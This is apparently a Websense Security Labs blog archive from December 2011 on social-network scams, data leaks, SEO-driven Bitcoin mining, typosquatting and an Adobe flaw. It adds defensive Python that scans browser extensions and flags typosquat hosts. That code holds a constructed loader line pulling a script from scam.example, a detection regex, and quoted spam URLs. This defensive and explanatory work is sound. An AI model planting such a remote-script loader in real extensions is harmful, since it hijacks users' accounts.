Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

Latest Blog Posts


(December 2011) Posts

Facebook launches new features

Posted: 29 Dec 2011 09:26 PM | Elisabeth Olsen | no comments


Timeline

A while back, we blogged about some upcoming changes on Facebook. The new Timeline layout is now ready for release. All Facebook accounts will be updated to the new Timeline layout on December 29, 2011. You may already have noticed changes in some profiles. Timeline has been accessible to all users for a while, giving them the choice to publish or simply modify their Timelines prior to the December 29 release.

We're interested to know what you think of these new Facebook features. Please enter your comments at the bottom of this blog post. And keep in mind that Websense technology can protect your Timeline from spam, malicious links, and unwanted comments. (Read here about the security partnership with Facebook that we announced in October.)

Sponsored Stories

In January 2012, Facebook users will start to see their photos appear in third-party advertisements in News Feeds. Facebook's new "Sponsored Stories" feature will appear in the Ticker section, a feature released earlier this year and located on the right-hand side of the Facebook page. Users will see targeted Sponsored Stories based on their friends' and their own "Page likes," check-ins, app shares, games played, and so on. These stories are visible only to people who are already eligible to see your News Feed story.

For example, if you own a small business and you want people to hear about you, you can pay to have activity posted in the Sponsored Stories column. These postings are based only on the actions of users' friends. Your business is more credible because the link comes from a friend. Facebook will implement this feature slowly, starting with one advertisement per day per user. According to a Facebook spokesperson, up to 10% of the stories appearing in the Ticker will be Sponsored Stories.

As the leading web content classification and security firm, and as a security partner with Facebook, Websense tracks these trends closely. We do not see increased security risks based on Sponsored Stories, but let us know what you think.


Chinese Internet Suffers the Most Serious User Data Leak in History

Posted: 27 Dec 2011 03:23 AM | Xue Yang | no comments


Last week, China's largest software programmers' Web site, CSDN (China Software Developer Network), was hacked, and account information for more than 6 million users was leaked and quickly spread via the Internet. One day later, Tianya, the biggest Chinese online forum, was reportedly hacked for the account information of 40 million users. The attacks have continued: several well-known sites, including the game sites Duowan and 7k7k, the e-commerce sites 360buy and Dangdang, and popular dating sites such as Zhenai, have been hacked and their user data leaked. Some sites' databases have been published on the Internet and can be easily downloaded.

...


Facebook scams kick it up a notch with Firefox/Chrome plugins

Posted: 20 Dec 2011 06:12 AM | Elad Sharf | no comments


Scams on Facebook are a daily thing. Websense® ThreatSeeker® Network recently detected some Facebook scams that now utilize the power of browser extensions to spread to other users' profiles. Scam pages typically utilize social engineering tricks, like enticing users with videos or offers for a free voucher, all of which lure victims to take part in the scam. Now, on top of that, we've found that victims are also asked to install a browser plugin. The plugin is an integral part of how the scam is spread. Once installed, the plugin connects to a script that uses the Facebook API and then posts the scam to the victim's friends' pages. One of the advantages of using a plugin is the ability to persist in the victim's browser and propagate to other profiles; that is similar to malicious Facebook applications we've seen before. We have noticed that at the moment, only Chrome and Firefox plugins are used.

This is how a sample scam page looks using the Chrome and Firefox browsers respectively:

The code checks which browser is installed and serves the compatible malicious plugin. Chrome plugin files end with the CRX file extension and Firefox plugin files end with the XPI file extension. Chrome and Firefox plugin files come in a compressed form. Looking inside these malicious plugins reveals some code that loads a script from external websites. This code is ultimately loaded by the browser that connects to Facebook. The code posts in the victim's name on the victim's friends' pages, which results in the victim further spreading the scam, spam, and possibly malware. To see the code behind the plugin of the scam shown above, take a look at these next images:

Here is another example of a scam with the same concept. The next two images show a 'Cheesecake Factory' voucher scam offering to download a Chrome plugin and how the scam looks in Facebook's news feed:

Websense Advanced Classification Engine, or ACE, helps protect users from such scams.
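The triage step the post describes, unpacking a CRX or XPI and looking inside for bundled scripts that pull a script from an external site, as an added example that is not code from the post. It assumes the CRX2 header layout Chrome used at the time (magic, version, key length, signature length, then key, signature and a ZIP); the sample extension and the host scam.example are constructed, and the regex is a heuristic for one common injection pattern.

```python
import io
import re
import struct
import zipfile

# CRX2 package header (the Chrome format in use in 2011): "Cr24" magic, then three
# little-endian uint32 fields (version, public-key length, signature length),
# followed by the key, the signature and finally an ordinary ZIP archive.
CRX_MAGIC = b"Cr24"

# Heuristic: a script element whose src is assigned an absolute http(s) URL.
REMOTE_SRC = re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)['"]""")


def extension_zip_bytes(data: bytes) -> bytes:
    """Return the ZIP payload of a CRX (Chrome) or XPI (Firefox) package."""
    if data.startswith(CRX_MAGIC):
        version, key_len, sig_len = struct.unpack("<III", data[4:16])
        if version != 2:
            raise ValueError(f"unsupported CRX version {version}")
        return data[16 + key_len + sig_len:]
    return data  # an XPI is a plain ZIP archive, nothing to strip


def find_remote_script_loads(package: bytes) -> list:
    """List (member, url) pairs for bundled scripts that inject a remote script."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith(".js"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            hits.extend((name, m.group(1)) for m in REMOTE_SRC.finditer(text))
    return hits


def build_sample_crx() -> bytes:
    """Constructed sample: a CRX2 whose content script pulls a script from a remote host."""
    zipped = io.BytesIO()
    with zipfile.ZipFile(zipped, "w") as zf:
        zf.writestr("manifest.json", '{"name": "sample", "version": "1.0"}')
        zf.writestr("content.js",
                    'var s = document.createElement("script");\n'
                    's.src = "http://scam.example/loader.js";\n'  # hypothetical host
                    'document.body.appendChild(s);\n')
    pubkey, sig = b"\x00" * 16, b"\x00" * 8  # dummy key and signature, not validated here
    header = CRX_MAGIC + struct.pack("<III", 2, len(pubkey), len(sig))
    return header + pubkey + sig + zipped.getvalue()


if __name__ == "__main__":
    for member, url in find_remote_script_loads(extension_zip_bytes(build_sample_crx())):
        print(f"{member}: loads remote script {url}")
```

A hit does not prove malice by itself (legitimate extensions also load remote code), but a freshly installed extension whose only job is to fetch a script from an unknown host is exactly the pattern worth reviewing.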


Bitcoin Miner with Black Hat SEO Poisoning Campaign

Posted: 20 Dec 2011 03:00 AM | Gianluca Giuliani | no comments


Bitcoin is a peer-to-peer currency exchange system that features a predictable currency rate. The generation of Bitcoin currency is controlled by an algorithm created by Japanese researcher Satoshi Nakamoto in 2008. Bitcoin system users are essentially "mining" for Bitcoins using their computers' CPU power. Today, because of the intrinsic characteristics of the Bitcoin-generating algorithm, calculating new "coins" in a reasonable amount of time without the use of distributed computing power is very difficult. It's important to remember that Bitcoins are like real money and can be exchanged for real money.

During a recent investigation, we encountered a new trend in the landscape of monetization techniques which can be triggered by a Black Hat SEO (BHSEO) poisoning campaign. What happens when BHSEO specialists meet a service offered, for example, by BitcoinPlus, which is used for mining Bitcoins? Well, we should never underestimate the cleverness and the imagination of cyber criminals. Specifically, we have encountered an array of Websites that have been set up for BHSEO purposes and that are used for Bitcoin mining.

Basically, this is the goal of BHSEO poisoning: reach a user for malicious purposes when that user is looking for something via a search engine. There are many ways to create a BHSEO campaign (or structure). The one most often used consists of creating and renaming a Website HTML page to be a popular keyword. So a global celebrity gossip news item can be a gold mine for anyone who wants to build a BHSEO campaign. This technique is frequently used to spread malware or some other kind of malicious content.

BitcoinPlus offers a service which allows a registered user to mine "coins" using some JavaScript that is added to their Website. This essentially means that the CPU power of any visitor's computer will be used to generate Bitcoins for the Bitcoin account owner. The code provided by BitcoinPlus is shown in the following screen shot; this is the code that is included in the BHSEO Website to generate Bitcoins:

Essentially the code requires the support of the minimal jQuery library, the call to the mining JavaScript code, and the registration of the BitcoinPlus user account. The following Java applet shows the miner.js call:

A brief analysis of this JAR file shows the code that calculates the amount of time necessary for any Web client visit to mine Bitcoins, as shown in the following code snippet:

Up to this point, nothing illegal has happened. But what would happen if this script is used for malicious intent? During our analysis using the Websense ThreatSeeker™ Network, we detected several Websites set up with the JavaScript snippet shown above. The screenshot below shows some of the Websites that are part of the BHSEO campaign explained earlier in this blog:

The keywords relate to a variety of topics: adult content, electronic devices, hacking, software, and so...


Lady Gaga's Twitter account tweeting links to survey scam

Posted: 19 Dec 2011 06:40 PM | Anonymous | no comments


The Twitter account of famous singer Lady Gaga has apparently been hacked. It's being used by attackers to lure her more than 17 million followers to click on a link:

After a number of redirects, the link ultimately leads to a survey scam that is designed to harvest personal information:

The first link uses the URL shortener bit.ly, which has suspended the link as "being potentially problematic." Although this should keep most users away from the scam for now, the attackers are likely to post new tweets that include phishing or malicious URLs as long as they have control of the account. The Twitter community has responded by sharing the fact that Lady Gaga's account shouldn't be trusted. This led to #stophackinggaga being a trending Twitter topic at the time this post was written. As always, be careful of links you click on Twitter, even when they appear to come from trusted accounts. Customers who are using Websense security products are protected from this spam campaign through our ACE technology and TRITON™ solutions.


"Lost Weight" Spam Campaign Spreading on Facebook and ibibo

Posted: 15 Dec 2011 11:20 PM | uwang | no comments


Websense® ThreatSeeker® Network has detected a new spam campaign spreading on Facebook and ibibo (a popular game site in India). The content of the spam messages is: "Lost 30 pounds in just 4 weeks all thanks to hcg. Check it out: http://spam_url". We have seen a number of similar spam campaigns on Facebook, such as "Sexiest Video Ever" on Facebook, Osama bin Laden scams on Facebook, etc. But unlike previous campaigns, which took advantage of a hot topic to lure visitors to click the link in the spam post, here the attackers publish a comment in the name of the account owner: "Never thought losing weight could be so easy!!!". With this method, some of the account owner's friends can be tricked into clicking the spam link:

For the Facebook version of the attack, the attackers abused the blogspot.com service, hosting the spam links on a set of throwaway blogspot.com hostnames.

The spam link redirects victims to another spam site. At the moment, the spam site is unavailable, but the attackers can always update the sites with malicious content. http://ad2ac.com/?s=15yy1 http://zcwqa2.com/?s=15yy2

The spam links used on ibibo point to newly registered sites, which are still unavailable now.

Websense customers are protected from these threats by ACE, our Advanced Classification Engine.


From ".com" to ".anything"

Posted: 12 Dec 2011 06:06 PM | RM | no comments


You may already know about the recent launch of the .xxx domain that is designed for websites with adult content. That is just the tip of the iceberg. ICANN (Internet Corporation for Assigned Names and Numbers), the organization that coordinates the Internet's addressing system, has announced a major evolution in the naming possibilities for generic top-level domains (gTLDs). Most Internet users are familiar with current gTLDs such as .com, .org, .edu, and so forth. Of course, there are also ccTLDs, two-letter country-code top-level domains, such as .us, .uk, .fr, .il (about 250 at the moment).

Beginning in 2012, ICANN is planning to allow any word in any alphabet (including non-ASCII) to be used as a gTLD, opening up the possibility for .pizza, .chocolate, .vodka, .מזלטוב ("Good luck" in Hebrew), and just about anything else you can imagine. ICANN anticipates that hundreds of new gTLDs will be added to the current 22. But don't expect to see .fred or .smithfamily anytime soon, since the process for obtaining a gTLD is much more complex and expensive than getting a vanity plate for the family car. You'll need to jump through a lot of legal and regulatory hoops, survive multiple reviews and objections, and pony up at least U.S. $185,000 in evaluation fees. Despite all this, ICANN expects to receive about 400-500 applications in the first round (submissions will be accepted from January 12 through April 12, 2012).

If you feel inspired to create a new ".something" and have a lot of spare change, check out the Applicant Guidebook for detailed information on how to apply for a new generic top-level domain. What name would you be willing to pay $185,000 to have? No matter what names are registered, you can bet that through various means, cybercrime syndicates will figure out how to take advantage of the situation. Websense® customers will still be protected with our Advanced Classification Engine, ACE, which filters websites based on the content of the site and not necessarily on the top-level domain.


A typosquat hostname list for Xmas

Posted: 08 Dec 2011 05:06 PM | Elad Sharf | no comments


A few weeks ago, we published a blog about typosquatting. This time, we're going to give an actual example of typosquat hosts found in the wild and show how typosquatting scams work. We'll take you through a typosquatting campaign that abuses tens of known brands and includes thousands of registered typosquat hosts (a typosquat hive). After that, we'll offer a list that includes hundreds of typosquatting hosts from that hive, all of which can be found in the wild. The list is free to download for any of you who are into IT security -- so this Xmas can be a bit safer.

In this blog we'll cover:

- A typosquatting example: If you make the wrong typo, where will it take you, and how does it work?
- A typosquat hive example from the wild: how does it work, which brands are targeted, and where will the typosquat take you?
- Which countries the typos are coming from with this campaign.
- Where the scam infrastructure is located.
- A list of hundreds of hosts used for typosquatting found in the wild. The list is free to download.

A typosquatting example: If you make the wrong typo, where does it take you?

We've all made typing mistakes when typing a Web address in our browser. In better cases, we get nothing more than a 404 not found error. In worse cases, we might be redirected to a scam site or a malware/exploit site. Usually, in the case of typosquatting-based cyber crimes, the victim that mistakenly made the typo is redirected to a scam site that tries to take advantage of the victim's state of mind. For example, victims who thought they typed in the right Web address might not notice if they see a scam site with the look and behavior that they expect, and that can profit the scammer. Victims might see a site with the same color scheme and theme as the brand or site they intended to go to, hand-in-hand with false congratulations on being a random winner who will receive a prize for completing a short survey.

The following video shows how it works:

A "typosquat hive" example from the wild: How does it work?

Typosquatting is illegal in the US. Nonetheless, a lot of typosquatting sites are hosted in the US. As an example, at the bottom of this blog, you'll find a list of hundreds of hosts that are part of a typosquat hive (the hive itself contains thousands of hosts), and all of them are hosted in the US. We call it a hive because all of the listed hosts have a connection, and were most likely set up by the same cybercriminals.

How does this specific scam work? Please refer to the image below, and we'll take you step-by-step right through it. The typosquat hive (marked 1 in the diagram) consists of many hostnames registered by the cybercriminals. (If you have a look through the list linked at the bottom of the blog, you'll find those names there.) The list consists of a lot of names that target very well known brands. The cybercriminals are interested in breadth -- they want to target as many well-known brands...
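One way to put a hostname list like the one the post offers to use on the defensive side: flag hosts whose second-level label is a one- or two-edit near-miss of a brand you protect (proxy logs, DNS logs, or a downloaded feed). This is an added example, not the post's code or its list; it generalizes the post's single typo case to any edit-distance near-miss, and the brand list and sample hosts are constructed.

```python
def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or swap adjacent chars."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition ("faecbook")
    return d[len(a)][len(b)]


def registrable_label(hostname: str) -> str:
    """Crude second-level label: 'www.gogle.com' -> 'gogle'. Assumes a one-label TLD."""
    parts = hostname.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify_hosts(hostnames, brands, max_distance=2) -> dict:
    """Map each host whose label is a near-miss of a brand label to that brand.

    Exact brand labels are skipped (they are the real site, not a typo)."""
    results = {}
    for host in hostnames:
        label = registrable_label(host)
        if label in brands:
            continue
        best = None
        for brand in brands:
            dist = damerau_levenshtein(label, brand)
            if dist <= max_distance and (best is None or dist < best[1]):
                best = (brand, dist)
        if best:
            results[host] = best[0]
    return results


# Constructed sample: brand labels to protect and a mixed host list (not the post's list).
BRANDS = ["facebook", "twitter", "youtube", "paypal"]
SAMPLE_HOSTS = ["www.faecbook.com", "twtter.com", "youtub.com",
                "paypal.com", "example.com", "paypa1.com"]

if __name__ == "__main__":
    for host, brand in classify_hosts(SAMPLE_HOSTS, BRANDS).items():
        print(f"{host}: likely typosquat of {brand}")
```

Short brand labels produce false positives at distance 2, so in practice scale max_distance with label length and whitelist the brand's own registered variants.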


Adobe Reader and Acrobat Vulnerability (CVE-2011-2462)

Posted: 07 Dec 2011 07:39 PM | Chris Astacio | no comments


Yesterday, Adobe released a Security Advisory warning about a vulnerability in Adobe Reader and Acrobat. Adobe rated this vulnerability "critical," because it may allow an attacker to execute code remotely and take control of an affected system. Adobe is currently working on a fix and planning to roll that fix out next week for the 9.x versions of its software for Windows. Because Adobe Reader X and Adobe Acrobat X have a sandboxing mechanism called Protected View, these versions will not allow code to be executed remotely. So for these newer X versions of the affected software, Adobe will issue a fix in its next quarterly update, currently scheduled for January 10, 2012.

Adobe lists Protected View as a way to safeguard your system against this threat. Please be sure to use the X version of Adobe software and verify that Protected View is enabled. The Mitigations section of the Adobe Security Advisory explains how to do this for the X versions. Websense Security Labs™ is aware of reports that this vulnerability has been used in the wild. We have updated our Advanced Classification Engine, ACE, to help protect against and look for any other possible attacks in the wild.


Let's be adult about it. xxx

Posted: 06 Dec 2011 03:31 PM | Elisabeth Olsen | no comments


On 12/6/2011 at 11 am EST, more than 100,000 Web sites are expected to go live with the new .xxx domain. XXX was approved as a "top-level domain" address last year by ICANN, and was set up to make it easier to identify adult sites. However, it has also had some unintended consequences. For example, if you own Acme Explosives and have operated acmeexplosives.com for years, you might want to register acmeexplosives.xxx too (just to make sure no one else registers it for a porn site, possibly besmirching your reputation with the demolition crowd). You could leave it as a null site, or you could redirect your new .XXX site to your standard .COM site.

Therein lies the rub: Websense will automatically categorize all .XXX sites as "Sex". But if you are Acme, you might prefer to have people redirected to your commercial site, rather than having them run into a block page. Have no fear. If you have registered a .XXX page that redirects to a non-adult site and would prefer to have it categorized to something that reflects the true content, just send your request to suggest@websense.com or use the online submission tool.

Websense customers automatically protected

A database download has been pushed out to all Websense customers, timed to take effect before the .XXX top-level domain goes live. Any product, from filtering to TRITON Enterprise, will have this domain categorized in their database as "Sex." We may have some folks out there using old, unsupported versions of Websense that may be in for a surprise, but it shouldn't affect any current customers.
